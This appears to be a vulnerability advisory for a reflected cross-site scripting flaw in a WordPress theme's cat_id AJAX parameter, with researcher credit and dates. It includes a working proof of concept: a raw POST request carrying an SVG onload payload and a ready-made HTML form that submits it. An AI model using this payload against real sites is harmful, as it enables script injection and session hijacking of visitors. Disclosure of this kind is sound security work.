The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
POST /?ajax-request=jnews HTTP/1.1 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Connection: close lang=en_US&cat_id=6"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 <html> <body> <form action="https://example.com/?ajax-request=jnews" method="POST"> <input type="hidden" name="lang" value="en_US" /> <input type="hidden" name="cat_id" value="6"><svg/onload=alert(/XSS/)>" /> <input type="hidden" name="action" value="jnews_build_mega_category_2" /> <input type="hidden" name="number" value="6" /> <input type="hidden" name="tags" value="70,64,10,67" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Truoc Phan from Techlab Corporation
Truoc Phan
Yes
2021-05-24 (about 1 years ago)
2021-05-24 (about 1 years ago)
2021-05-24 (about 1 years ago)